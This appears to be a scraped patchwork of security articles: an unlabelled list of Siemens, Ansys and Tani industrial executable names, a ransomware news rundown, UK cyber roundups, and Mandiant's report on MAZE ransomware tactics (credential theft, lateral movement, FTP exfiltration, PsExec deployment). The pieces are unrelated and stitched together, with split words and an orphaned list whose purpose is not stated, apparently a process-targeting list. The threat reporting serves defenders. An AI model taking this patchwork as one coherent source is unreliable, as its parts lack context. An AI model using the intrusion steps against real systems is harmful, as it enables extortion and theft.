Siemens

CCKEYBOARDHOOK.EXE

Siemens

CCLICENSESERVICE.EXE

Siemens

CCNSINFO2PROVIDER.EXE

Siemens

CCPACKAGEMGR.EXE

Siemens

CCPERFMON.EXE

Siemens

CCPROFILESERVER.EXE

Siemens

CCPROJECTMGR.EXE

Siemens

CCPTMRTSERVER.EXE

Siemens

CCREDUNDANCYAGENT.EXE

Siemens

CCREMOTESERVICE.EXE

Siemens

CCRT2XML.EXE

Siemens

CCRTSLOADER_X64.EXE

Siemens

CCSSMRTSERVER.EXE

Siemens

CCSYSTEMDIAGNOSTICSHOST.EXE

Siemens

CCTEXTSERVER.EXE

Siemens

CCTLGSERVER.EXE

Siemens

CCTMTIMESYNC.EXE

Siemens

CCTMTIMESYNCSERVER.EXE

Siemens

CCUCSURROGATE.EXE

Siemens

CCWATCHOPC.EXE

Siemens

CCWRITEARCHIVESERVER.EXE

Siemens

DA2XML.EXE

Siemens

GSCRT.EXE

Siemens

HMIES.EXE

Siemens

HMIRTM.EXE

Siemens

HMISMARTSTART.EXE

Siemens

HMRT.EXE

Siemens

IPCSECCOM.EXE

Siemens

OPCUASERVERWINCC.EXE

Siemens

PASSDBRT.EXE

Siemens

PDLRT.EXE

Siemens

PMEXP.EXE

Siemens

PNIOMGR.EXE

Siemens

REDUNDANCYCONTROL.EXE

Siemens

REDUNDANCYSTATE.EXE

Siemens

S7ACMGRX.EXE

Siemens

S7AHHLPX.EXE

Siemens

S7ASYSVX.EXE

Siemens

S7EPASRV64X.EXE

Siemens

S7HSPSVX.EXE

Siemens

S7KAFAPX.EXE

Siemens

S7O.TUNNELSERVICEHOST.EXE

Siemens

S7OIEHSX64.EXE

Siemens

S7OPNDISCOVERYX64.EXE

Siemens

S7SYMAPX.EXE

Siemens

S7TGTOPX.EXE

Siemens

S7TRACESERVICE64X.EXE

Siemens

S7UBTOOX.EXE

Siemens

S7UBTSTX.EXE

Siemens

S7WNRMSX.EXE

Siemens

S7WNSMGX.EXE

Siemens

S7WNSMSX.EXE

Siemens

S7XUDIAX.EXE

Siemens

S7XUTAPX.EXE

Siemens

SCORECFG.EXE

Siemens

SCOREDP.EXE

Siemens

SCOREPNIO.EXE

Siemens

SCORES7.EXE

Siemens

SCORESR.EXE

Siemens

SCSDISTSERVICEX.EXE

Siemens

SCSFSX.EXE

Siemens

SCSMX.EXE

Siemens

SDIAGRT.EXE

Siemens

SIEMENS.INFORMATIONSERVER.DISCOVERSERVICEINSTALLER.EXE

Siemens

SIEMENS.INFORMATIONSERVER.ISREADY.PLUGINSERVICE.EXE

Siemens

SIEMENS.INFORMATIONSERVER.SCHEDULER.EXE

Siemens

SIM9SYNC.EXE

Siemens

SIMNETPNPMAN.EXE

Siemens

SMARTSERVER.EXE

Siemens

SSERVCFG.EXE

Siemens

TOUCHINPUTPC.EXE

Siemens

TRACECONCEPTX.EXE

Siemens

TRACESERVER.EXE

Siemens

UM.RIS.EXE

Siemens

UM.SSO.EXE

Siemens

WEBNAVIGATORRT.EXE

Siemens

WINCCEXPLORER.EXE

Siemens

CCDMRTCHANNELHOST.EXE

Siemens

ANSYS.ACT.BROWSER.EXE

Ansys

ANSYS.EXE

Ansys

ANSYS192.EXE

Ansys

ANSYSFWW.EXE

Ansys

ANSYSLI_CLIENT.EXE

Ansys

ANSYSLI_MONITOR.EXE

Ansys

ANSYSLI_SERVER.EXE

Ansys

ANSYSLMD.EXE

Ansys

ANSYSWBU.EXE

Ansys

CONFIGSERVERI64.EXE

Tani

ENGINELOGGERI64.EXE

Tani

PLCENGINEI64.EXE

Tani

Webcast: What About Ransomware?

This is a joint webcast between Black Hills Information Security and the Wild West Hackin’ Fest conference. We hate ransomware. Like a lot. This is because we feel this is the future of cyber attacks. If you look at the recent cases and the newish versions that involve extortion, there is nothing to like. Well, […]

The post Webcast: What About Ransomware? appeared first on Black Hills Information Security.

Cyber News Rundown: Ragnar Locker

Reading Time: ~ 2 min.

Ragnar Locker Attacks Portuguese Energy Producer

It was recently confirmed that Energias de Portugal (EDP), one of the largest energy producers in the world, has fallen victim to the Ragnar Locker ransomware variant. The original attack took place in April but was only discovered in May after nearly three weeks of being active on their systems. After contacting affected customers, the company also revealed it was subject to a Bitcoin ransom of roughly $10 million to ensure the stolen data wasn’t publicly released.

Xchanging MSP Falls Victim to Ransomware

An MSP known as Xchanging, which primarily serves the insurance industry, was hit with a ransomware attack over the weekend that forced it to take many of its systems offline. Though the attack was largely confined to Xchanging’s systems and only affected a small number of customers, it is still unclear how long the infection was active before discovery. In a statement, the company says it’s working to restore access to customer operating environments as quickly as possible.

Fitness Firm Exposes Customer Info

Nearly 1.3 million customer files and photos were compromised after the fitness firm V Shred was breached, potentially affecting up to 100,000 clients. The data was stored on an improperly configured Amazon S3 bucket that was discovered as a part of a larger mapping project that had already located several similar leaks. While V Shred confirmed much of the data was publicly available, it originally denied that the dataset itself contained full names, addresses, and other highly sensitive personal information that could be used maliciously.

Magecart Group Surpasses 570 Victim Sites

In the three years since Magecart Group 8’s initial foray onto the card-skimming scene, it has successfully compromised over 570 e-commerce sites around the world. More than 25 percent of the attacks targeted US domains and stemmed from 64 unique attack domains that were able to distribute injected JavaScript software with relative ease. Many were nearly identical to legitimate domains. It’s believed the group has netted over $7 million from selling stolen payment card information since April 2017.

Clubillion Casino App Leak Could Affect Millions

A database containing personally identifiable information on millions of users of the casino app Clubillion was compromised in late March. The breach was discovered and secured within five days, though heavy traffic to the site may have enabled the compromise of hundreds of thousands more individuals in that time. These types of apps are common targets of cyberattacks because they hold such large quantities of sensitive data that can be used for further attacks by leveraging the stolen data.

The post Cyber News Rundown: Ragnar Locker appeared first on Webroot Blog.

Cyber Security Roundup for July 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, June 2020.

Australian Prime Minister Scott Morrison announced a sophisticated nation-state actor is causing increasing havoc by attacking the country’s government, corporate institutions, and his country's critical infrastructure operators. He said, “We know it is a sophisticated state-based cyber actor because of the scale and nature of the targeting and the tradecraft used". While Morrison didn't actually name the specific country responsible in his statement, Reuters said its sources confirmed China was the culprit.  Political t
ensions have ramped up between Australia and China in recent months after Australia called for an investigation into China’s handling of the COVID-19 pandemic. China then reacted by placing tariffs on Australian exports and banning shipments of beef from Australia.

Why am I leading a UK cybersecurity blog with an Australian cyberattacks story? Well, it is because the UK might well be next in the cross-hairs of China's sophisticated cyber army, after the UK Governance stance on using Huawei in 5G infrastructure significantly soured last month. And also due to the increasing political pressure applied by the UK government on the Chinese government following their introduction of a controversial new security law in Hong Kong.

Increased UK Huawei Tensions in June 2020
While the Australian PM righty suggested their nation-state threat actor was sophisticated, the cyberattacks they described aren't so sophisticated. Their attackers engaged in spear-phishing campaigns designed to trick email recipients into clicking a link leading to a malicious files or credential harvesting page, opening malicious attachments or granting Office 365 OAuth tokens to the actors.  This is the same MO of cyber attacks orchestrated by the cybercriminals fraternity on a daily basis. The Australian government statement advises organisations to patch their internet-facing devices, including web and email servers and to use multifactor authentication. All good advise, in fact, all essential good practice for all organisations to adopt no matter their threat actor landscape.

Away from the international cyber warfare scene, a coalition led by security companies is urging the UK government to revamp the much-dated Computer Misuse Act. The UK's 'anti-hacking' law is 30 years old, so written well before the internet took root in our digital society, so is not really suitable for prosecuting for modern cybercriminals, they tend to be prosecuted under financial crime and fraud laws. The coalition is calling for a change in the law includes the NCC Group, F-Secure, techUK, McAfee and Trend Micro. They argue section 1 of the Act prohibits the unauthorised access to any programme or data held in any computer and has not kept pace with advances in technology. In their letter to PM they said "With the advent of modern threat intelligence research, defensive cyber activities often involve the scanning and interrogation of compromised victims and criminals systems to lessen the impact of attacks and prevent future incidents. In these cases, criminals are obviously very unlikely to explicitly authorise such access."

Since launching a 'Suspicious Email Reporting Service' in April 2020, the UK National Cyber Security Centre (NCSC) announced it has now received one million reports, receiving around 16,500 emails a day. NCSC Chief Executive Officer Ciaran Martin called the number of reports a “milestone” and “a testament to the vigilance of the British public". I think the email reporting service is another fantastic free service provided by NCSC (i.e. UK Gov) to UK citizens, so one thing the UK government is definitely getting right in the cybersecurity space at the moment.

Zoom announced it will extend 'optional' end-to-end encryption (E2EE) to free users. It is not certain when exactly Zoom's free E2EE will commence or whether it will be defaulted as on, given the Zoom CEO said, “We plan to begin early beta of the E2EE feature in July 2020.” Still good to see the much security criticised Zoom is continuing to bolstering its security, and also by appointing a seasoned Chief Information Security Officer from Salesforce.

Some men just want to watch the world burn...
With the recent uptick in ransomware, phishing, unsecured cloud buckets and massive data breaches dominating the media headlines over the past couple of years, you could be forgiven for forgetting about the threat posed by Distributed-Denial-of-Service (DDoS) attacks. So then, a timely reminder that some threat actors have vast botnets as their disposal for orchestrating huge DDoS attacks after Amazon reported thwarting the biggest ever DDoS attack, and a European bank suffered the biggest ever PPS DDoS attack. The motives of these colossal DDoS attacks are unclear, I guess some men just want to watch the world burn.
Quote from Batman butler Alfred (Michael Caine), The Dark Knight
BLOG
NEWS
VULNERABILITIES AND SECURITY UPDATES
AWARENESS, EDUCATION AND THREAT INTELLIGENCE

    Cyber Security Roundup for June 2020

    A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, May 2020.

    EasyJet's disclosure of a "highly sophisticated cyber-attack", which occurred in January 2020, impacting 9 million of their customers was the biggest cybersecurity story of May 2020 in the UK. Although no details about this 'cyber-attack' were disclosed, other than 2,208 customers had their credit card details accessed.  


    Using terms like "highly sophisticated" without providing any actual details of the cyberattack makes one think back to when TalkTalk CEO Dido Harding described a cyber-attack as "significant and sustained cyber-attack" in 2015. In TalkTalk's case, that cyber attack turned out to be a bunch of teenage kids taking advantage of a then 10-year-old SQL injection vulnerability.  City A.M. described Dido's responses as "naive", noting when asked if the affected customer data was encrypted or not, she replied: "The awful truth is that I don’t know". Today Dido is responsible for the UK governments Track, Test and Trace application, which no doubt will ring privacy alarms bells with some. 

    Back to the EasyJet breach, all we know is the ICO and the NCSC are supporting UK budget airline, EasyJet said "We take issues of security extremely seriously and continue to invest to further enhance our security environment. There is no evidence that any personal information of any nature has been misused, however, on the recommendation of the ICO, we are communicating with the approximately nine million customers whose travel details were accessed to advise them of protective steps to minimise any risk of potential phishing. We are advising customers to be cautious of any communications purporting to come from EasyJet or EasyJet Holidays." 

    It will be interesting to see the DPA enforcement line Information Commission's Office (ICO) adopts with EasyJet, especially considering the current COVID-19 impact on the UK aviation industry.  Some security commentators have called ICO a "Toothless Tiger" in regards to their supportive response, an ICO label I've not heard since long before the GDPR came into force. But the GDPR still has a sting its tail beyond ICO enforcement action in the UK, in that individuals impacted by personal data breaches can undertake a class-action lawsuit. So then, it can be no real surprise to law firm PGMBM announce it has issued a class-action claim in the High Court of London, with a potential liability of an eye-watering £18 billion!. If successful, each customer impacted by the breach could receive a payout of £2,000.

    The 2020 Verizon Data Breach Investigations Report (DBIR) was released, the most valuable annual report in the cybersecurity industry in my humble opinion. The 2020 DBIR used data compiled before COVID-19 pandemic.  The report analyses 32,002 security incidents and 3,950 confirmed breaches from 81 global contributors from 81 countries.
    • 86% of data breaches for financial gain - up from 71% in 2019 
    • 43% web application (cloud-based) - these attacks have doubled, reflecting the growth in the use of cloud-based services.
    • 67% of data breaches resulted from credential theft, human error or social attacks. 
    • Clearly identified cyber-breach pathways enable a “Defender Advantage” in the fight against cyber-crime 
    • On-going patching successful - fewer than 1 in 20 breaches exploit vulnerabilities
    The vast majority of breaches continue to be caused by external actors.
    • 70% with organised crime accounting for 55% of these. 
    • Credential theft and social attacks such as phishing and business email compromises cause the majority of breaches (over 67%), specifically:
      • 37% of credential theft breaches used stolen or weak credentials,
      • 25% involved phishing
      • Human error accounted for 22%
    The 2020 DBIR highlighted a two-fold increase in web application breaches, to 43%, and stolen credentials were used in over 80% of these cases. Ransomware had a slight increase, found in 27% of malware incidents compared to 24% in the 2019 DBIR with 18% of organisations reported blocking at least one piece of ransomware last year.

    REvil (aka Sodinokibi) hackers are said to have stolen celebrity data from a law firm 'Grubman Shire Meiselas & Sacks'. With 756 gigabytes of personal data, emails, and contract details were taken, including Lady Gaga, Madonna, Elton John, Barbara Streisand, Bruce Springsteen and Mariah Carey to name a few. 

    Pitney Bowes was hit with ransomware for the second time in 7 monthsPitney Bowes said attackers breached company systems and accessed “a limited set of corporate file shares” that “contained information used by our business teams and functional groups to conduct business-related activities.” News reports state the Maze ransomware group is behind the attack, threatening to post confidential if Pitney Bowes does not pay up.

    Amazon's UK website was defaced with racist abuse,  which appeared on multiple listings on its UK website. Amazon has not disclosed how long the racist language remained on the site, but it sparked outrage on Twitter, Amazon said: "We investigated, removed the images in question and took action against the bad actor".

    LogMeOnce, a password identity management suite provider, has published a detailed interview with myself titled 'Passwords are and have always been an Achilles Heel in CyberSecurity'. In the Q&A I talk about Passwords Security (obviously), Threat Actors, IoT Security, Multi-Factor Authentication (MFA), Anti-Virus, Biometrics, AI, Privacy, and a bit on how I got into a career in Cybersecurity.

    BLOG
    NEWS
    VULNERABILITIES AND SECURITY UPDATES
    AWARENESS, EDUCATION AND THREAT INTELLIGENCE

      Passwords are and have always been an Achilles Heel in CyberSecurity

      LogMeOnce, a password identity management suite provider, has published a detailed interview with myself titled 'Passwords are and have always been an Achilles Heel in CyberSecurity'. In the Q&A I talk about Passwords Security (obviously), Threat Actors, IoT Security, Multi-Factor Authentication (MFA), Anti-Virus, Biometrics, AI, Privacy, and a bit on how I got into a career in Cybersecurity.

      Quotes
      “I’m afraid people will remain the weakest link in security, and the vast majority of cybercriminals go after this lowest hanging fruit. It’s the least effort for the most reward.”

      "There is no silver bullet with password security, but MFA comes close, it significantly reduces the risk of account compromise"

      "The built-in biometric authentication capabilities of smartphones are a significant advancement for security"

      "Cybercriminals go after this lowest hanging fruit, the least effort for the most reward."

      "As technology becomes more secure and more difficult to defeat, it stands to reason criminals will increasingly target people more."

      "The impact of the WannaCry ransomware outbreak on NHS IT systems is a recent example of such cyberattack which threatens lives."

      "Machine Learning can provide real benefits, especially in large Security Operations Centres (SOC), by helping analysts breakdown the steady stream of data into actionable intelligence, reducing workload and false-positive errors"

      "When I look at new technology today, I still seek to thoroughly understand how it works, naturally thinking about the weaknesses which could be exploited, and the negative impact of such exploits on the people and businesses using the technology. I developed a kind of a ‘hacker’s eye for business’"

      Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents

      Targeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across industries and geographies. FireEye Mandiant Threat Intelligence has previously documented this threat in our investigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other aspects of post-compromise ransomware deployment. Since November 2019, we’ve seen the MAZE ransomware being used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate model.

      Malicious actors have been actively deploying MAZE ransomware since at least May 2019. The ransomware was initially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise. Multiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in underground forums and distinct tactics, techniques, and procedures across Mandiant incident response engagements. Actors behind MAZE also maintain a public-facing website where they post data stolen from victims who refuse to pay an extortion fee.

      The combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise networks—with a criminal service makes MAZE a notable threat to many organizations. This blog post is based on information derived from numerous Mandiant incident response engagements and our own research into the MAZE ecosystem and operations.

      Mandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21 webinar.

      Victimology

      We are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE website since November 2019. These organizations have been primarily based in North America, although victims spanned nearly every geographical region. Nearly every industry sector including manufacturing, legal, financial services, construction, healthcare, technology, retail, and government has been impacted demonstrating that indiscriminate nature of these operations (Figure 1).


      Figure 1: Geographical and industry distribution of alleged MAZE victims

      Multiple Actors Involved in MAZE Ransomware Operations Identified

      Mandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking partners to fulfill different functional roles within their teams. Additional information on these actors is available to Mandiant Intelligence subscribers. A panel used to manage victims targeted for MAZE ransomware deployment has a section for affiliate transactions. This activity is consistent with our assessment that MAZE operates under an affiliate model and is not distributed by a single group. Under this business model, ransomware developers will partner with other actors (i.e. affiliates) who are responsible for distributing the malware. In these scenarios, when a victim pays the ransom demand, the ransomware developers receive a commission. Direct affiliates of MAZE ransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment. This includes partners who provide initial access to organizations and pentesters who are responsible for reconnaissance, privilege escalation and lateral movement—each of which who appear to work on a percentage-basis. Notably, in some cases, actors may be hired on a salary basis (vs commission) to perform specific tasks such as determining the victim organization and its annual revenues. This allows for specialization within the cyber criminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.


      Figure 2: MAZE ransomware panel

      MAZE Initially Distributed via Exploit Kits and Spam Campaigns

      MAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019. For example, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware primarily to individuals at organizations in Germany and the United States, although a significant number of emails were also delivered to entities in Canada, Italy, and South Korea. These emails used tax, invoice, and package delivery themes with document attachments or inline links to documents which download and execute Maze ransomware.

      On November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject lines “Wichtige informationen uber Steuerruckerstattung” and “1&1 Internet AG - Ihre Rechnung 19340003422 vom 07.11.19” (Figure 3). Recipients included individuals at organizations in a wide range of industries, with the Financial Services, Healthcare, and Manufacturing sectors being targeted most frequently. These emails were sent using a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.


      Figure 3: German-language lure

      On November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located in the United states. These emails originated from a compromised or spoofed account and contained an inline link to download a Maze executable payload.

      On November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United States and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5). These emails used the subjects “Missed package delivery” and "Your AT&T wireless bill is ready to view" and were sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks. Notably, this registrant address was also used to create multiple Italian-language domains towards the end of November 2019.


      Figure 4: AT&T email lure


      Figure 5: Canada Post email lure

      Shift to Post-Compromise Distribution Maximizes Impact

      Actors using MAZE have increasingly shifted to deploying the ransomware post-compromise. This methodology provides an opportunity to infect more hosts within a victim’s environment and exfiltrate data, which is leveraged to apply additional pressure on organizations to pay extortion fees. Notably, in at least some cases, the actors behind these operations charge an additional fee, in addition to the decryption key, for the non-release of stolen data.

      Although the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar, there have been notable variations across intrusions that suggest attribution to distinct teams. Even within these teams, the cyber criminals appear to be task-oriented meaning that one operator is not responsible for the full lifecycle. The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the divergence that may occur due to the fact that numerous, disparate actors are involved in different phases of these operations. Notably, the time between initial compromise to encryption has also been widely varied, from weeks to many months.

      Initial Compromise

      There are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents. This is consistent with our observations of multiple actors who use MAZE soliciting partners with network access. The following are a sample of observations from several Mandiant incident response engagements:

      • A user downloaded a malicious resume-themed Microsoft Word document that contained macros which launched an IcedID payload, which was ultimately used to execute an instance of BEACON.
      • An actor logged into an internet-facing system via RDP. The account used to grant initial access was a generic support account. It is unclear how the actor obtained the account's password.
      • An actor exploited a misconfiguration on an Internet-facing system. This access enabled the actor to deploy tools to pivot into the internal network.
      • An actor logged into a Citrix web portal account with a weak password. This authenticated access enabled the actor to launch a Meterpreter payload on an internal system.

      Establish Foothold & Maintain Presence

      The use of legitimate credentials and broad distribution of BEACON across victim environments appear to be consistent approaches used by actors to establish their foothold in victim networks and to maintain presence as they look to meet their ultimate objective of deploying MAZE ransomware. Despite these commonplace behaviors, we have observed an actor create their own domain account to enable latter-stage operations.

      • Across multiple incidents, threat actors deploying MAZE established a foothold in victim environments by installing BEACON payloads on many servers and workstations.
      • Web shells were deployed to an internet-facing system. The system level access granted by these web shells was used to enable initial privilege escalation and the execution of a backdoor.
      • Intrusion operators regularly obtained and maintained access to multiple domain and local system accounts with varying permissions that were used throughout their operations.
      • An actor created a new domain account and added it to the domain administrators group.

      Escalate Privileges

      Although Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect credentials to enable privilege escalation, these efforts have also been bolstered in multiple cases via use of Bloodhound, and more manual searches for files containing credentials.

      • Less than two weeks after initial access, the actor downloaded and interacted with an archive named mimi.zip, which contained files corresponding to the credential harvesting tool Mimikatz. In the following days the same mimi.zip archive was identified on two domain controllers in the impacted environment.
      • The actor attempted to find files with the word “password” within the environment. Additionally, several archive files were also created with file names suggestive of credential harvesting activity.
      • The actor attempted to identify hosts running the KeePass password safe software.
      • Across multiple incidents, the Bloodhound utility was used, presumably to assess possible methods of obtaining credentials with domain administrator privileges.
      • Actors primarily used Procdump and Mimikatz to collect credentials used to enable later stages of their intrusion. Notably, both Bloodhound and PingCastle were also used, presumably to enable attackers' efforts to understand the impacted organization's Active Directory configuration. In this case the responsible actors also attempted to exfiltrate collected credentials to multiple different cloud file storage services.

      Reconnaissance

      Mandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance across observed MAZE incidents. The varied tools and approaches across these incidents maybe best highlights the divergent ways in which the responsible actors interact with victim networks.

      • In some intrusions, reconnaissance activity occurred within three days of gaining initial access to the victim network. The responsible actor executed a large number of reconnaissance scripts via Cobalt Strike to collect network, host, filesystem, and domain related information.
      • Multiple built-in Windows commands were used to enable network, account, and host reconnaissance of the impacted environment, though the actors also supplied and used Advanced IP Scanner and Adfind to support this stage of their operations.
      • Preliminary network reconnaissance has been conducted using a batch script named '2.bat' which contained a series of nslookup commands. The output of this script was copied into a file named '2.txt'.
      • The actor exfiltrated reconnaissance command output data and documents related to the IT environment to an attacker-controlled FTP server via an encoded PowerShell script.
      • Over a period of several days, an actor conducted reconnaissance activity using Bloodhound, PowerSploit/PowerView (Invoke-ShareFinder), and a reconnaissance script designed to enumerate directories across internal hosts.
      • An actor employed the adfind tool and a batch script to collect information about their network, hosts, domain, and users. The output from this batch script (2adfind.bat) was saved into an archive named 'ad.7z' using an instance of the 7zip archiving utility named 7.exe.
      • An actor used the tool smbtools.exe to assess whether accounts could login to systems across the environment.
      • An actor collected directory listings from file servers across an impacted environment. Evidence of data exfiltration was observed approximately one month later, suggesting that the creation of these directory listings may have been precursor activity, providing the actors with data they may have used to identify sensitive data for future exfiltration.

      Lateral Movement

      Across the majority of MAZE ransomware incidents lateral movement was accomplished via Cobalt Strike BEACON and using previously harvested credentials. Despite this uniformity, some alternative tools and approaches were also observed.

      • Attackers relied heavily on Cobalt Strike BEACON to move laterally across the impacted environment, though they also tunneled RDP using the ngrok utility, and employed tscon to hijack legitimate rdp sessions to enable both lateral movement and privilege escalation.
      • The actor moved laterally throughout some networks leveraging compromised service and user accounts obtained from the system on which they gained their initial foothold. This allowed them to obtain immediate access to additional systems. Stolen credentials were then used to move laterally across the network via RDP and to install BEACON payloads providing the actors with access to nearly one hundred hosts.
      • An actor moved laterally using Metasploit and later deployed a Cobalt Strike payload to a system using a local administrator account.
      • At least one actor attempted to perform lateral movement using EternalBlue in early and late 2019; however, there is no evidence that these attempts were successful.

      Complete Mission

      There was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents. While malicious actors could monetize stolen data in various way (e.g. sale in an underground forum, fraud), actors employing MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion fee.

      • An actor has been observed exfiltrating data to FTP servers using a base64-encoded PowerShell script designed to upload any files with .7z file extensions to a predefined FTP server using a hard-coded username and password. This script appears to be a slight variant of a script first posted to Microsoft TechNet in 2013.
      • A different base64-encoded PowerShell command was also used to enable this functionality in a separate incident.
      • Actors deploying MAZE ransomware have also used the utility WinSCP to exfiltrate data to an attacker-controlled FTP server.
      • An actor has been observed employing a file replication utility and copying the stolen data to a cloud file hosting/sharing service.
      • Prior to deploying MAZE ransomware threat actors employed the 7zip utility to archive data from across various corporate file shares. These archives were then exfiltrated to an attacker-controlled server via FTP using the WinSCP utility.

      In addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network. Notably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will double, likely to create a sense of urgency to their demands.

      • Five days after data was exfiltrated from a victim environment the actor copied a MAZE ransomware binary to 15 hosts within the victim environment and successfully executed it on a portion of these systems.
      • Attackers employed batch scripts and a series to txt files containing host names to distribute and execute MAZE ransomware on many servers and workstations across the victim environment.
      • An actor deployed MAZE ransomware to tens of hosts, explicitly logging into each system using a domain administrator account created earlier in the intrusion.
      • Immediately following the exfiltration of sensitive data, the actors began deployment of MAZE ransomware to hosts across the network. In some cases, thousands of hosts were ultimately encrypted. The encryption process proceeded as follows:
        • A batch script named start.bat was used to execute a series of secondary batch scripts with names such as xaa3x.bat or xab3x.bat.
        • Each of these batch scripts contained a series of commands that employed the copy command, WMIC, and PsExec to copy and execute a kill script (windows.bat) and an instance of MAZE ransomware (sss.exe) on hosts across the impacted environment
        • Notably, forensic analysis of the impacted environment revealed MAZE deployment scripts targeting ten times as many hosts as were ultimately encrypted.

      Implications

      Based on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used throughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the initial intrusion vector. For more comprehensive recommendations for addressing ransomware, please refer to our Ransomware Protection and Containment Strategies blog post and the linked white paper.

      Mandiant Security Validation Actions

      Organizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant Security Validation. Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security Validation Customer Portal for more information.

      • A100-877 - Active Directory - BloodHound, CollectionMethod All
      • A150-006 - Command and Control - BEACON, Check-in
      • A101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1
      • A101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2
      • A101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3
      • A100-878 - Command and Control - MAZE Ransomware, C2 Check-in
      • A100-887 - Command and Control - MAZE, DNS Query #1
      • A100-888 - Command and Control - MAZE, DNS Query #2
      • A100-889 - Command and Control - MAZE, DNS Query #3
      • A100-890 -  Command and Control - MAZE, DNS Query #4
      • A100-891 - Command and Control - MAZE, DNS Query #5
      • A100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC
      • A100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page
      • A101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2
      • A100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)
      • A104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound, CollectionMethod All
      • A104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell
      • A104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy
      • A104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks
      • A104-037 - Host CLI - Credential Access, Discovery: File & Directory Discovery
      • A104-052 - Host CLI - Credential Access: Mimikatz
      • A104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)
      • A104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools
      • A104-491 - Host CLI - Defense Evasion, Persistence: MAZE, Create Target.lnk
      • A104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection
      • A104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell
      • A104-374 - Host CLI - Discovery: Enumerate Active Directory Forests
      • A104-493 - Host CLI - Discovery: Enumerate Network Shares
      • A104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User
      • A104-482 - Host CLI - Discovery: Language Query Using reg query
      • A104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory
      • A104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant
      • A104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
      • A104-027 - Host CLI - Discovery: Process Discovery
      • A104-028 - Host CLI - Discovery: Process Discovery with PowerShell
      • A104-029 - Host CLI - Discovery: Remote System Discovery
      • A104-153 - Host CLI - Discovery: Security Software Identification with Tasklist
      • A104-083 - Host CLI - Discovery: System Info
      • A104-483 - Host CLI - Exfiltration: PowerShell FTP Upload
      • A104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message
      • A104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media
      • A100-879 - Malicious File Transfer - Adfind.exe, Download
      • A150-046 - Malicious File Transfer - BEACON, Download
      • A100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant
      • A100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant
      • A100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant
      • A101-037 - Malicious File Transfer - MAZE Download, Variant #1
      • A101-038 - Malicious File Transfer - MAZE Download, Variant #2
      • A101-039 - Malicious File Transfer - MAZE Download, Variant #3
      • A101-040 - Malicious File Transfer - MAZE Download, Variant #4
      • A101-041 - Malicious File Transfer - MAZE Download, Variant #5
      • A101-042 - Malicious File Transfer - MAZE Download, Variant #6
      • A101-043 - Malicious File Transfer - MAZE Download, Variant #7
      • A101-044 - Malicious File Transfer - MAZE Download, Variant #8
      • A101-045 - Malicious File Transfer - MAZE Download, Variant #9
      • A101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1
      • A101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2
      • A100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4
      • A101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download
      • A100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download
